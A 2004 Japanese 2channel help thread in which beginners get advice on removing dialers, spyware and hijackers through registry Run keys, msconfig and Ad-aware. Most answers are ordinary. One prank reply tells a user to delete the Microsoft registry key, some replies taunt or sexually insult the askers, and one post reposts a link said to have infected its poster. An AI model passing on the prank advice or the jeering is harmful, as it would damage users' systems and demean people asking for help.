マルチすみませんでしたm(_ _)m

283 :ひよこ名無しさん:04/07/08 12:07 ID:???
( ・_ゝ・)

284 :ひよこ名無しさん:04/07/08 12:59 ID:???
なんであろう、cnsminが削除できない

285 :ひよこ名無しさん:04/07/08 12:59 ID:???
ヘー(´ν_.` )ソウナンダ

286 :ひよこ名無しさん:04/07/08 15:50 ID:xc3ZGzg3


パソコンがトラブル→ドラえもんのタイムふろしきをPCに被せる→少し昔に戻す→(゚Д゚)ウマー

287 :ひよこ名無しさん:04/07/08 18:52 ID:???
>>284
CnsMinの除去方法
ttp://higaitaisaku.web.infoseek.co.jp/removecnsmin.html

288 :ひよこ名無しさん:04/07/08 20:21 ID:???
>>284
ざまあみろ

289 :ひよこ名無しさん:04/07/08 20:25 ID:???
お前ら、どんなエロサイト見てるん?
そんなにエロサイトが好きか?
少しはPCをもっと有効に使えや

290 :ひよこ名無しさん:04/07/08 21:09 ID:???
お前ら、どんなエロサイト見てるん?
そんなにエロサイトが好きか?
少しはPCをもっと有効に使えや

291 :ひよこ名無しさん:04/07/08 21:27 ID:hP7D2yva
最近流行のgifに化けているトロイに感染したらしく、もろに個人情報を大公開してしまったようです。

どうすればいいんでしょう・・・・・。

292 :ひよこ名無しさん:04/07/08 21:32 ID:???
変更できるものはスグ変更する。

293 :ひよこ名無しさん:04/07/08 21:37 ID:CEe/ptg0
よし!性転換しよう!ヽ(´▽`)ノ

294 :ひよこ名無しさん:04/07/08 23:07 ID:Nkdtq94R
今PCを起動したら、sexcams_jpという見知らぬアイコンがデスクトップにありました。
プロパティを見たら、ファイルの種類はショートカット、リンク先は
"C:\Program Files\vcom\dialers\sexcams_jp\sexcams_jp.exe" /SCTYPE = 2となっています。
これは何だか分かりますか?ネット初心者なので訳が分かりません。
以前にニュー即でクソリンクを踏んでしまったことがあり、その時に60近くのウイルスと
7つのスパイウェアに感染したことがあるのですが、そいつらはad-awareと
スパイポットサーチなるもので退治した経験があります。
それ以来1週間に1回はウイルス退治をするのですが、毎回数匹見つかります。
この変なアイコンをどうしたらいいですか?アドバイスをお願いします。

295 :ひよこ名無しさん:04/07/08 23:12 ID:???
>>294
ざ ま あ み ろ

296 :ひよこ名無しさん:04/07/08 23:13 ID:???
>>294
ざ ま あ み ろ

297 :ひよこ名無しさん:04/07/08 23:14 ID:???
>>294
たぶんエロなダイアラーだと思われ

[プログラムの追加と削除]で削除するのが吉

298 :ひよこ名無しさん:04/07/08 23:19 ID:???
>>294
Ctrl+Alt+Delete>タスク>sexcams_jpを終了
"C:\Program Files\vcom\dialers\sexcams_jp\sexcams_jp.exe" /SCTYPE = 2を削除
ファイル名を指定して実行>regeditと入力
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunのSexCams_jp削除

299 :ひよこ名無しさん:04/07/08 23:20 ID:IfzQO0gT
Sleipnir使っているんですが
OperaとMozillaのがスパイウェアに感染しにくいのですか?




300 :ひよこ名無しさん:04/07/08 23:22 ID:???
Opera v7.51のインストールと日本語化の手順

■v7.23以前をインストールしている場合は「アプリケーションの(プログラム)の
 追加と削除」からアンインストール。(7.5からは上書きインストで問題ない)

■Opera本家から本体をダウンロード
  Opera7.51(最新版)http://www.opera.com/download/?lng=en&ver=7.51
 いちばん下の赤い DOWNLOAD ボタンを押す。

■Opera本家から言語ファイルをダウンロード
  http://my.opera.com/community/customize/langs/
 Select Opera Version and Language ←バージョンと言語の選択ボックス
 ▼ボタンを押してリストを開く→Windows-7.50 Japnese(1) をそれぞれ選択→
 地球儀アイコンをクリック→ja_74818.lngという日本語用言語ファイルが選択される→
 Opera.exeが存在するフォルダにダウンロードする。

■Operaに日本語言語ファイルを設定
  Operaを起動→OperaのメニューのTools→Preferences→ Languages→
 User Interface Languageでchooseボタンを押す→ダウンロードしたja_74818.lng
 を選択→OK
これでメニューは日本語で表示されるはず。日本語優先の設定もしておこう。
 Tools→設定→言語→「ウェブページの閲覧で優先する言語」で「追加」→
 japanese(ja)選択→「上へ移動」ボタンで一番上にする→「エンコード情報が不足
 しているページに使用するエンコード方法」→shift_jisを選択→適用→OK

301 :ひよこ名無しさん:04/07/08 23:23 ID:???
>>299
Sleipnirはあまりに無力。IEとほとんど変わらない。

302 :ひよこ名無しさん:04/07/08 23:27 ID:???
Opera v7.51のインストールと日本語化の手順

■v7.23以前をインストールしている場合は「アプリケーションの(プログラム)の
 追加と削除」からアンインストール。(7.5からは上書きインストで問題ない)

■Opera本家から本体をダウンロード
  Opera7.51(最新版)http://www.opera.com/download/?lng=en&ver=7.51
 いちばん下の赤い DOWNLOAD ボタンを押す。

■Opera本家から言語ファイルをダウンロード
  http://my.opera.com/community/customize/langs/
 Select Opera Version and Language ←バージョンと言語の選択ボックス
 ▼ボタンを押してリストを開く→Windows-7.50 Japnese(1) をそれぞれ選択→
 地球儀アイコンをクリック→ja_74818.lngという日本語用言語ファイルが選択される→
 Opera.exeが存在するフォルダにダウンロードする。

■Operaに日本語言語ファイルを設定
  Operaを起動→OperaのメニューのTools→Preferences→ Languages→
 User Interface Languageでchooseボタンを押す→ダウンロードしたja_74818.lng
 を選択→OK
これでメニューは日本語で表示されるはず。日本語優先の設定もしておこう。
 Tools→設定→言語→「ウェブページの閲覧で優先する言語」で「追加」→
 japanese(ja)選択→「上へ移動」ボタンで一番上にする→「エンコード情報が不足
 しているページに使用するエンコード方法」→shift_jisを選択→適用→OK

303 :ひよこ名無しさん:04/07/08 23:27 ID:???
>>299
SleipnirはIEの部品を使ってる。フリーソフトのブラウザはほとんどそう。
OperaとMozillaは独自開発。

304 :ひよこ名無しさん:04/07/08 23:32 ID:???
Opera最高!!

305 :294:04/07/08 23:33 ID:Nkdtq94R
>>295-296
_| ̄|○

>>297-298
ありがとうございます。
>>298の2行目なのですが、どうやって削除すればいいのですか?
デスクトップのアイコンを右クリック→削除でいいのですか?
削除してもアンインストールはできませんと出たので、>>297でいわれた
[プログラムの追加と削除]で削除しました。
>>298の3〜4行目は実行していないのですが、もう大丈夫なのですか?
何度もすみません。

306 :ひよこ名無しさん:04/07/08 23:33 ID:???
firefoxはもっと最高!!


307 :ひよこ名無しさん:04/07/08 23:38 ID:???
>>305
大丈夫

308 :ひよこ名無しさん:04/07/08 23:39 ID:???
ブラウザ戦争勃発!!
Sleipnir vs Opera vs Mozilla

309 :ひよこ名無しさん:04/07/08 23:39 ID:???
だまされて☆-(ノ゚Д゚)八(゚Д゚ )ノイヤーがる

310 :294:04/07/08 23:43 ID:Nkdtq94R
>>307
ありがとうございます。・゚・(ノД`)・゚・。
アンインストールしたらアイコンが消えていたのですが、
念には念を入れたかったので聞きました。
助かった。・゚・(ノД`)・゚・。
マジ感謝です。・゚・(ノД`)・゚・。

311 :ひよこ名無しさん:04/07/08 23:44 ID:???
いやレジストリは消しとけよ
だまされてるぞお前

312 :ひよこ名無しさん:04/07/08 23:46 ID:???
>>310
再起動したら無事完了です

313 :ひよこ名無しさん:04/07/08 23:49 ID:???
>>310
レジストリにカスが残ってたら、PCが挙動不審になる場合がある。
できれば不要なキーは削除しておきましょう。

314 :299:04/07/08 23:55 ID:IfzQO0gT
>300>301>302>303
ありがとうございます!
パソコン初心者なんですが
このスレ読んでたらSleipnirがまったくでてこないので
どうしてなのか知りたくて
303さんのレスで意味がわかりました!

315 :298:04/07/09 00:01 ID:???
>>310
何が大丈夫なのか?
大丈夫じゃないから>>298なんだが

316 :ひよこ名無しさん:04/07/09 00:04 ID:???
厨房のPCなどこわさせておけ。
おまえはよくやった。

317 :ひよこ名無しさん:04/07/09 00:06 ID:???
>>310
ざ ま あ み ろ


318 :298:04/07/09 00:14 ID:???
>>316
そうするよ

319 :ひよこ名無しさん:04/07/09 00:17 ID:???
IEでやられてしまったので、PCリカバリした上でバスター導入してOperaに乗り換えた。
今のところ無問題。
Operaで怪しいアドレス踏むと、いくつかタブは開くけど「不正なアドレスです」
って出るだけでおしまい。

320 :ひよこ名無しさん:04/07/09 00:19 ID:ZtBtHaDr
ウィルス総合スレから誘導されてきました
ここの上から2番目のリンクを押したらウイルスに掛かってしまいました。
PCを起動すると青い画面が出るだけで、アイコンもスタートメニューも表示されません。
タスクマネージャでプログラムを起動することはできるのですが、ウイルスチェックで怪しいファイルを消しても画面は治りません。
どうしたら直るのでしょう・・・助けてくださいお願いします。

http://hobby5.2ch.net/test/read.cgi/dog/1087391900/82

321 :ひよこ名無しさん:04/07/09 00:20 ID:???
そんなもんここに張るな

セーフモードでの起動は試したか?
どうやってここに書いてんだ?

322 :ひよこ名無しさん:04/07/09 00:22 ID:???
>>320
私はこのスレを「読め」と言ったはずだが?

323 :ひよこ名無しさん:04/07/09 00:37 ID:???
>>320=>>322
もう( ゚д゚)アキタヨ・・・

324 :294:04/07/09 01:44 ID:DpKUabCy
>>311-313
(((( ;゚Д゚)))ガクガクブルブル
今レジストリをいじってるのですが、>>294
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunのSexCams_jp
の「\」っていうのは、最初にHKEY_LOCAL_MACHINEをクリックして、そこでいっぱい出てきた中から
次にSOFTWAREをクリック、次にMicrosoftをクリック・・・っていう感じでいいのですか?
この方法で最期のRunまで辿りついたのですが、SexCams_jpっていうのがありません。
俺の操作方法まちがっていますか?

325 :ひよこ名無しさん:04/07/09 01:48 ID:???
>>324
Microsoftを消すこと。

326 :ひよこ名無しさん:04/07/09 01:49 ID:???
>>324
ガキじゃねーんだから、なにがあるか書けよ。

327 :ひよこ名無しさん:04/07/09 01:50 ID:???
ガキでももう少しどうしたらいいのか解る。

328 :ひよこ名無しさん:04/07/09 01:50 ID:???
>>324
HKEY_CURRENT_USER\SOFTWARE\(以下略) の方も確認するヨロシ

329 :ひよこ名無しさん:04/07/09 01:50 ID:???
>>325
こらこら

330 :294:04/07/09 01:52 ID:DpKUabCy
>>325
たぶんそれはありえないとおもう

>>326
「クリエイトCD」っていうヤシが2つあります。あるのはそれだけです。
ちなみに>>324でRunって書きましたが、正確にはRun-と表示されています。
Run=Run-でいいのですか?

331 :294:04/07/09 01:55 ID:DpKUabCy
>>328
今HKEY_CURRENT_USER\SOFTWARE\〜Runまで辿ったら
Yahoo Japan Pagerっていうのだけがありました。モウイミワカラン・・・

332 :ひよこ名無しさん:04/07/09 01:55 ID:???
>>330
"Run-" は,セキュリティツールか何かが危険だと判断して
隔離しているエントリじゃないですか?

例えば WinMe だと,msconfig で無効にした Run 内のエントリが
Run- に隔離されるようになっていたりします。

333 :294:04/07/09 01:57 ID:DpKUabCy
>>332
俺のOSはMEです。
隔離(?)されている場合はどうすれば削除できるのですか?

334 :ひよこ名無しさん:04/07/09 02:01 ID:???
>>333
隔離されているならば悪さはしないはずなので,Run- については放っておいてよさげ。
Run の近くに RunOnce もあるはずなのでチェック

っていうか WinMe ならば話は早いかも。
msconfig 起動して下さい。「ファイル名を指定して実行」で msconfig って。
「スタートアップ」タブを開いて,「名前」の欄をちょっとここで列挙してみてくださいな。

335 :294:04/07/09 02:05 ID:DpKUabCy
>>334
ありがとうございます。
列挙ですか?右クリックでコピペできないので打つのに少し時間が
かかると思います。すこし待ってください。

336 :ひよこ名無しさん:04/07/09 02:06 ID:???
>>334
別に何も問題ないけど、暇だろうから晒してみた。

C:\Program Files\Apoint\Apoint.exe ←多分タッチパッド
C:\PROGRA~\B'SCLI~1\Win2K\BSCLIP.exe ←B's CLIP
HotKey Utility\HKserv.exe ←ホットキー
Jog Dial Utility\JogServ2.exe ←ジョグダイアル  ←要らないな
PELMICED.EXE
PRPCUI.exe
PDVDServ.exe ←POWER DVD
mobsync.exe /logon


337 :ひよこ名無しさん:04/07/09 02:07 ID:???
なんだか Hijackthis のログを貼ってもらった方が速いのかもw
でもあれはログの量が多いし,msconfig があるなら Run レジストリの無効化も楽だし。
まあ何にしても面倒くさいですね,こういう問題の対処ってのは。

338 :ひよこ名無しさん:04/07/09 02:09 ID:???
>>336 vaio?

339 :ひよこ名無しさん:04/07/09 02:10 ID:???
>>338
そう。

mobsyncはなんかの同期だったかな。忘れた。

340 :ひよこ名無しさん:04/07/09 02:13 ID:???
>>339
IE5/6 の何からしいすね。よくわかんないけどw
ttp://www.liutilities.com/products/wintaskspro/processlibrary/mobsync/
ttp://www.reger24.de/prozesse/mobsync.exe.php

341 :294:04/07/09 02:17 ID:DpKUabCy
【その1】
yahoo japan pager
sr64
internet.exe
ScanRegistry
TaskMonitor
PCHealth
Systemtray
Hidserv
LoadPawerProfile
CountorySelection
PCTVICE
Alogserv

342 :294:04/07/09 02:18 ID:DpKUabCy
【その2】
FMVSCAN
RealTlay
WinapAgent
QuickTime Task
System
Adapetec DirectCD
CreateCD
LoadPowarProfile
SchedulingAgent
SSDPARV
McAfeeVirusScanService
MachineDebugManager
Dmtdll
run=
以上です。遅くなってすみません

343 :ひよこ名無しさん:04/07/09 02:19 ID:???
>>341
勘で怪しげなのリストうp

sr64
CountorySelection
PCTVICE
Alogserv

検索に引っ掛らないのあるけど不正確でしょ?
internet.exeじゃないし。internatね。

344 :ひよこ名無しさん:04/07/09 02:23 ID:???
>>342
Dmtdll もぁゃιぃ

起動している msconfig 画面の,そのリストの左にチェックボックスがあるはずなので
343 さんが挙げたやつも一緒に,チェックボックスのチェックを外してみましょ。

345 :294:04/07/09 02:24 ID:DpKUabCy
>>343
4つもですか・・・。アボーン。
ちなみに間違いなくinternet.exeです。.exeがケツについてます。

346 :ひよこ名無しさん:04/07/09 02:25 ID:???
>>345
マジ?

internet.exeだとモロウィルスだよ。internat.exeに似せた奴ね。
イキナリ引っ掛る。

http://www.symantec.com/region/jp/sarcj/data/a/adware.ting.html

347 :294:04/07/09 02:26 ID:DpKUabCy
>>344
ありがとうございます。
とりあえずチェックを外してみました。次はどうすればいいのですか?

348 :ひよこ名無しさん:04/07/09 02:27 ID:???
>>345
あーちょっと待って,ちょっと待って。
intern a t.exe ですか? それとも intern e t.exe?
a ? それとも e ?

349 :ひよこ名無しさん:04/07/09 02:28 ID:???
internet.exe キタ─wwヘ√レvv~(゚∀゚)─wwヘ√レvv~─ !!!

350 :294:04/07/09 02:28 ID:DpKUabCy
>>346
ウイルスですか?(((( ;゚Д゚)))ガクガクブルブル
Ad-awere使ったのに。

351 :ひよこ名無しさん:04/07/09 02:29 ID:???
>>347
それから「Win.ini」タブもあるはずなので,その中の
[windows] の中の "run=" の部分になにかあれば,それもここに晒してみて下さい。

352 :ひよこ名無しさん:04/07/09 02:29 ID:???
>>350
スパイウェア・アドウェアとしても認識されてるみたいね。

353 :ひよこ名無しさん:04/07/09 02:30 ID:???
ウヒョ!!
漏れもMeだったんで便乗してsr64をクリナップしたんだが、
再起動してみると、直せなかった起動時Net自動接続と
自動ローカル(D:)回覧が起動しなくなった!
これってイイ事だよね?

354 :294:04/07/09 02:31 ID:DpKUabCy
>>348
あ!Intern a t.exe でした。eじゃなくaです。
ごめんなさい。
ちなみにコマンドのところにもIntern a t.exe と表示されています。

355 :ひよこ名無しさん:04/07/09 02:32 ID:???
>>353
オメ。

356 :294:04/07/09 02:35 ID:DpKUabCy
>>351
[windows] の中に
RUN=c:Windows\system\dmtdll.exe
っていうのがあります。

357 :294:04/07/09 02:37 ID:DpKUabCy
>>351
>>356の追加
[windows] の中に"run=" はありませんでした。

358 :ひよこ名無しさん:04/07/09 02:39 ID:???
>>356
じゃあそれのチェックも外して,
あとは再起動で大丈夫かなあ?

あと気になるのは >>342 の System ていうエントリなんだけど
それの「コマンド」ってどうなってますか。

あと SSDPARV ていうエントリについては全く情報がないので怖いなー……

359 :ひよこ名無しさん:04/07/09 02:44 ID:???
dmtdll は厄介だなー (;´Д`) 「クルクル」なんて俗称がついてるんすね。
二重三重の自動起動が施されてるって。。。

360 :294:04/07/09 02:44 ID:DpKUabCy
>>358
Systemのコマンドなんですけど、かなり怪しいです。
c:\Free_sex_Download.exe
です。これはやばそうですよね?

361 :ひよこ名無しさん:04/07/09 02:46 ID:???
>>360
あははははは。
モロだね。

362 :ひよこ名無しさん:04/07/09 02:47 ID:???
>>360
ベタベタすぎてワラタ(;´Д`)深夜なのにコマル
チェックボックスを外しましょう。

再起動して様子を見て下さい。
これで解決しなければ,私はもうパス。。。

363 :294:04/07/09 02:50 ID:DpKUabCy
>>361-362
。・゚・(ノД`)・゚・。
チェックボックスを外して、右下の「適用」をクリックして、次に
「OK」をクリックして、全てのウインドウを閉じて再起動っていう
手順でOKですか?

364 :ひよこ名無しさん:04/07/09 02:50 ID:???
>>363
OKのはずです。

365 :CM:04/07/09 02:51 ID:???

     ∧__∧
   /  /   \             只今>>363君は再起動中でPC御座います、暫くのあいだ
   |_,ィ●   (。) | =ャ=ャ=ャ=ャ      マスコットキャラクターヒョッポ君の笑顔を眺めながら
   |┌  ⊂⊃ ┐| =ャ=ャ=ャ        ごゆるりとおくつろぎ下さい。 
   |  \__/ | =ャ=ャ=ャ=ャ
   \  \|/ /

366 :294:04/07/09 02:53 ID:DpKUabCy
>>364
ありがとうございます。
これから再起動してみますので、↓のAAを見ながら少しお待ちください

             _,-――‐―-,_
          ,, <      、   、___,≧、
         /   `゛''ー---` ̄´l.| |. |. l ヽ
       冫        ,,≠  =.,、|. | |. |. | ヽ 
       /   ,,r===''"     _|`|'''|ー|-|  ゛,  ひどいブー
      f     ,r'" ̄・ノ  (_・ `ヽ,      ',-‐.、
    ,r'´|       ̄ ̄´ rー-、   ̄゛´      |  }
    .{  !          ゛’’"           j__,ノ 
    ゝ、_l,   ,r'´~`ヽ     >   ,r'´ ̄ヽ   !
       ',   { f"`} ノ   ,イ    !, ,r´`} ノ.  ,'
       ゛、 ゛ ゛ー"    U    ゛`ー‐"  ,.'
         ` 、                , "
            ''  , ,__ ____,,

367 :ひよこ名無しさん:04/07/09 02:55 ID:???
余計なAA探している暇があったら、さっさと再起動汁!

368 :294:04/07/09 02:57 ID:DpKUabCy
お待たせしました。
再起動終了しました。
これでもう大丈夫なのですか?

369 :ひよこ名無しさん:04/07/09 03:03 ID:???
そういえば大元の >>294 の問題を解決していなかった気が
ていうか >>305 で削除したような事を書いてるけど,今はどうすか。
Ctrl + Alt + Delete してみて,seccams_jp とか何かありますか。

370 :ひよこ名無しさん:04/07/09 03:03 ID:???
みんな寝ちまったようだから、とりあえず今日はここまでにして
また何かあれば来たらええよ。

371 :ひよこ名無しさん:04/07/09 03:07 ID:b4mXx/2d
about:blank、search for型 について質問です。

>>9と、被害対策にある手順を実行しまして、一時的に症状は治まりますが
IEを使用中にまたsearch forに飛ばされてしまいます。
他に気付いた点といえば、WEB設定のリセットが出来なくなってる事くらいです。

後はどのような対処をすれば良いでしょうか?

372 :294:04/07/09 03:11 ID:DpKUabCy
>>369
!!!!!!!
今度はありました。「Run-」の中にさっきチェック外したヤシ全てがいらっしゃいます。
(((( ;゚Д゚)))ガクガクブルブル
これを削除ですか?右クリックで削除でいいのですか?

373 :294:04/07/09 03:13 ID:DpKUabCy
>>372の訂正
>>343でうpされてるsr64はありませんでした。

374 :294:04/07/09 03:17 ID:DpKUabCy
みんな寝ちゃったのかな・・・_| ̄|○

375 :ひよこ名無しさん:04/07/09 03:19 ID:???
       ○
       ノ|)
  _| ̄|○ <し


  ○
(( (ヽヽ    パコパコ
   >_| ̄|○

376 :294:04/07/09 03:21 ID:DpKUabCy
また明るくなったらこのスレにお邪魔しようと思います。
こんな夜中に手伝っていただいてありがとうございました。
ちなみに今の段階では、まだ>>372のヤシ等を削除はしていません。
では失礼します。本当にありがとうございました。

377 :165:04/07/09 03:25 ID:???
>>376
また来いよ。

378 :ひよこ名無しさん:04/07/09 03:59 ID:???
また来いよワロタ。

悟空があの世に帰るシーンを思い出した。

379 :ひよこ名無しさん:04/07/09 04:05 ID:???
    /  /  /    /    }     |\        |
   /  /  /    /     __/      }  \     |
 /  / /   __/      / }       }   \  |
/ / /__,‐-''´ ̄     /   }        }     \|
/ / ̄ ヽ  //    /  o  /  /____|
/   _  ( /   /   / /   \
______  ̄~ゝ‐-''´ゝ、、/_/        \
\`ヽ_  ̄o〕 |彡     ̄  _/~~\      \    ま 
.//\ ``''''''´ |//      /  )   \    /    た
/// //ヽ   |   / / /V /~ ̄ }  /    来
./ /// ///}  |_// _//  /~|     } ./      い
./// /// /\ <~....ゝ <_ /  i    <.        よ
// /// /// /\ \   {_ {   i   <  \       。
. /// /// /////\ \ <_ {     / /  \
.// /// ////// // \ \ |\‐-''´/      \
/ /// ////// // /// /\ `''-‐/         /
/// ////// // /// /////´´~~ ̄~`'''-- - -  /     /|
./ ////// // /// ////,,‐-''´~~`'''-‐,,,___  /   /   |
.////// // /// ///‐-''´~ ̄ ̄ ̄       /  /      |
///// // /// //       \      //        |
./// // ////     \     \               |
// // ///   \     \     \             レ

380 :ひよこ名無しさん:04/07/09 14:27 ID:d+unMiQ4
http://www.lavasoftusa.com/
でダウンロードが始まらないのですが自分のがおかしいのでしょうか?

381 :ひよこ名無しさん:04/07/09 14:36 ID:???
>>380
ログ読め

382 :ひよこ名無しさん:04/07/09 14:50 ID:btvsekRo
ウィンドウズMeです。インターネットを開くと、青いページで
Detected SPY ware! System error #384
と出てしまい、操作するとアダルトサイトに飛ばされてしまいます。
Ad-awareとSpybotを使ったのですが直りません。
どなたかお力を貸してください、お願いします。

383 :ひよこ名無しさん:04/07/09 14:53 ID:???
>>382
窓の手使え。

384 :ひよこ名無しさん:04/07/09 14:56 ID:nRWVZHrV
質問です。
他スレでスルーされてしまいましたので。2ちゃん見てたら、アダルトサイトに飛ばされたんです。 そして、デスクトップにそのアダルトサイトのショートカットが作成されてます。 このショートカットが消えないんです。 Windowsが使用してますって表示がでます。 どなたか消し方教えてください

385 :ひよこ名無しさん:04/07/09 14:57 ID:r6nxkoPA
私も>>380さんと同じです
ダウンロードが始まりません。サイトの不具合ってことはないですか?

386 :ひよこ名無しさん:04/07/09 14:58 ID:???
>>384
おまいがパソコンの前から消えろ!

387 :384:04/07/09 15:03 ID:nRWVZHrV
本当に困ってます。

388 :ひよこ名無しさん:04/07/09 15:03 ID:???
>>385
http://www.nysfola.org/lavasoft/aaw6181.exe

389 :ひよこ名無しさん:04/07/09 15:05 ID:???
ほんとはエロサイト見てたらなったんだろ?
本当のこと言えよクロチンコ童貞。

390 :ひよこ名無しさん:04/07/09 15:05 ID:???
>>387
スレを嫁。そして、やれ。

391 :ひよこ名無しさん:04/07/09 15:07 ID:???
>>384
>>4を読んで、実行できる範囲で実行すること。

392 :ひよこ名無しさん:04/07/09 15:12 ID:???
>>384
ほんとはエロサイト見てぽこちんこすってたんだろ?
ほんとのこと言わないとこのまま流れて終わりだぜ?
童貞黒チンコぼーいがよ

393 :382:04/07/09 15:13 ID:btvsekRo
窓の手インストールしましたが、どう使えば良いのか分からないです。

394 :ひよこ名無しさん:04/07/09 15:49 ID:???
>>393
力を貸してあげたいけど、382の情報だけじゃどうしようもないんですよ。
ttp://higaitaisaku.web.infoseek.co.jp/removereg32.html

395 :ひよこ名無しさん:04/07/09 16:05 ID:???
>>393
ヘルプ読めヴォケ

396 :382:04/07/09 16:15 ID:btvsekRo
2ちゃんのリンクで騙されてアダルトサイトに飛んでしまったのが原因かと思われます。
被害対策のページを合間に読みながらこっちにもカキコしているんですがイマイチ分からないです。


397 :ひよこ名無しさん:04/07/09 16:16 ID:???
>>396
http://wonderful.at/2ch
3番目のところ嫁。

398 :ひよこ名無しさん:04/07/09 16:20 ID:???
>>393
「窓の手使え」というのはネタ回答。(「窓の手」は便利だからインストール
しておいていいが、ハイジャッカー退治のツールではない)

テンプレ、「まとめサイト」を読み、できるとこまでやってから再度質問。



399 :ひよこ名無しさん:04/07/09 16:20 ID:???
ロリサイトには逝くなよ。

400 :ひよこ名無しさん:04/07/09 16:43 ID:r6nxkoPA
>>388さん
私はいつかくらい前からこちらや違う板でスパイウェアの駆除について
アドバイスを貰っていたものです。私もダウンロードができずに本の
付録を探していたのですが見つからずどうしようと悩んでいました。
本当に助かりました ありがとうございました!
ダニマークのところに234個とでました。続きをやります(*^▽^*)

401 :Opera最新版は7.52、lngファイルは7.50:04/07/09 16:43 ID:???
Opera v7.52のインストールと日本語化の手順

■v7.23以前をインストールしている場合は「アプリケーションの(プログラム)の
 追加と削除」からアンインストール。(7.5xからは上書きインストで問題ない)

■Opera本家から本体をダウンロード
  Opera7.5(最新版)http://www.opera.com/download/?lng=en&ver=7.52
 いちばん下の赤い DOWNLOAD ボタンを押す。

■Opera本家から本体ファイルをダウンロード
  Opera7.52(最新版)http://www.opera.com/download/?lng=en&ver=7.52
 いちばん下の赤いDOWNLOADボタンを押す。ダウンロードサイトを選ぶ。
 (米国サイトが成功率高い。混んでいたら別のサイトを選択)

■Opera本家から7.50用言語ファイルをダウンロード
  http://my.opera.com/community/customize/langs/
 Select Opera Version and Language ←バージョンと言語の選択ボックス
 ▼ボタンを押してリストを開く→Windows-7.50 Japnese(1) をそれぞれ選択→
 地球儀アイコンをクリック→ja_74818.lngという日本語用言語ファイルが選択される→
 Opera.exeが存在するフォルダにダウンロードする。★7.51用の日本語ファイルは
 アフォなので選んではダメ。7.52用日本語ファイルは未発表。

■Operaに日本語言語ファイルを設定
  Operaを起動→OperaのメニューのTools→Preferences→ Languages→
 User Interface Languageでchooseボタンを押す→ダウンロードしたja_74818.lng
 を選択→OK
 これでメニューは日本語で表示されるはずだが、日本語優先の設定もしておこう。
 Tools→設定→言語→「ウェブページの閲覧で優先する言語」で「追加」→
 japanese(ja)選択→「上へ移動」ボタンで一番上にする→「エンコード情報が不足
 しているページに使用するエンコード方法」→shift_jisを選択→適用→OK

402 :ひよこ名無しさん:04/07/09 16:45 ID:???
>>401
オペラ自体がスパイウェアじゃないのか?

403 :ひよこ名無しさん:04/07/09 16:49 ID:???
Opera7.52日本語版 エロサイト巡りの時ぐらいはこれにしな
http://public.planetmirror.com/pub/opera/win/752/ja/

404 :Opera最新版は7.52、lngファイルは7.50:04/07/09 16:52 ID:???
★アドウェア問題★
Opera無料版はアドウェアなので広告が表示される。

「広告」の設定は「Tools→設定→起動と終了」の三番目の項目。英語版なら
Tools/ Preferences/ Start and Exit/ Advertising

○ Googleから提供される関連のある広告…→WEB閲覧履歴がGoogleに送信される
○ 一般的な画像の広告…→履歴がGoogleに送信されない

Googleに履歴が送信されるのがいやらなら、Tools→設定→広告「一般的な画像
の広告を表示」に設定すること。(広告の表示領域は7.2xと同様になる)


>>401で ”■Opera本家から本体をダウンロード”の項目が一部ダブった。スマソ。)



405 :ひよこ名無しさん:04/07/09 16:56 ID:???
operaは糞

406 :400:04/07/09 17:02 ID:r6nxkoPA
Some objects coulld not be removed,
Try closing all open browzer windows prior to the removal.
If this dose not help,reboot and run Ad-aware agein.
そのあとに10個くらい何か書いてあって最後に
Do you want to let Ad-aware remove them after the next reboot?
って書いてあるんですけどOKですか?CANCELですか?押すのは・・・?
英語苦手ですみません。

407 :ひよこ名無しさん:04/07/09 17:03 ID:???
>>401
日本語版7.52ならインストールから全部日本語で楽に導入できるYO!!

408 :ひよこ名無しさん:04/07/09 17:13 ID:???
>>407
opera入れてみようと思うんですが、日本語版7.52ってどこから
落とせるんですか?

409 :ひよこ名無しさん:04/07/09 17:14 ID:???
>>408
>>403


410 :ひよこ名無しさん:04/07/09 17:18 ID:???
>>408
std/ の方で良い

411 :406:04/07/09 17:26 ID:r6nxkoPA
検索したらwebで翻訳してくれるところがありました。

いくつかのオブジェクトを削除することができないかもしれません、
閉鎖を試みる、すべては、削除に先立ったブラウザー・ウィンドウを開けます。
これが助けにならない場合、リブート、また再び広告知っているようになります。
あなたはさせたいと思いますか、広告知っている削除、それら、次のリブートの後に?

となったのでOK押してもう一回やってみます!


412 :294:04/07/09 18:20 ID:utxpqt9P
こんにちは。294です。
>>372に書いたように
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
>>343-344の作業後に表示されるようになったヤシ等を右クリックで
削除すればもう完了ですか?何度もすみません。

413 :ひよこ名無しさん:04/07/09 18:31 ID:/blwYwsJ
テンプレ一通り試したのですが治りません。
OSは98SEです。

ハイジャックログ書きます。

414 :413:04/07/09 18:32 ID:/blwYwsJ
Logfile of HijackThis v1.97.7
Scan saved at 17:26:32, on 04/07/09
Platform: Windows 98 SE (Win9x 4.10.2222A)
MSIE: Internet Explorer v5.51 SP2 (5.51.4807.2300)

Running processes:
C:\WINDOWS\SYSTEM\KERNEL32.DLL
C:\WINDOWS\SYSTEM\MSGSRV32.EXE
C:\WINDOWS\SYSTEM\MPREXE.EXE
C:\WINDOWS\SYSTEM\DHCP95\DHCP95S.EXE
C:\WINDOWS\SYSTEM\MSTASK.EXE
C:\WINDOWS\SYSTEM\mmtask.tsk
C:\WINDOWS\EXPLORER.EXE
C:\WINDOWS\SYSTEM\IMEJPMGR.EXE
C:\WINDOWS\SYSTEM\SYSTRAY.EXE
C:\PROGRAM FILES\CREATIVE\SHAREDLL\CTNOTIFY.EXE
C:\PROGRAM FILES\MICROSOFT HARDWARE\MOUSE\POINT32.EXE
C:\WINDOWS\LOADQM.EXE
C:\WINDOWS\TASKMON.EXE
C:\PROGRAM FILES\ADAPTEC\DIRECTCD\DIRECTCD.EXE
C:\PROGRAM FILES\NORTON ANTIVIRUS\NAVAPW32.EXE
C:\PROGRAM FILES\WINAMP\WINAMPA.EXE
C:\PROGRAM FILES\REAL\REALPLAYER\REALPLAY.EXE

415 :413:04/07/09 18:33 ID:/blwYwsJ
C:\WINDOWS\SYSTEM\QTTASK.EXE
C:\PROGRAM FILES\CREATIVE\SHAREDLL\MEDIADET.EXE
C:\PROGRAM FILES\CREATIVE\SBLIVE\AUDIOHQ\AHQTB.EXE
C:\WINDOWS\SMUNPLUG.EXE
C:\WINDOWS\SYSTEM\A.EXE
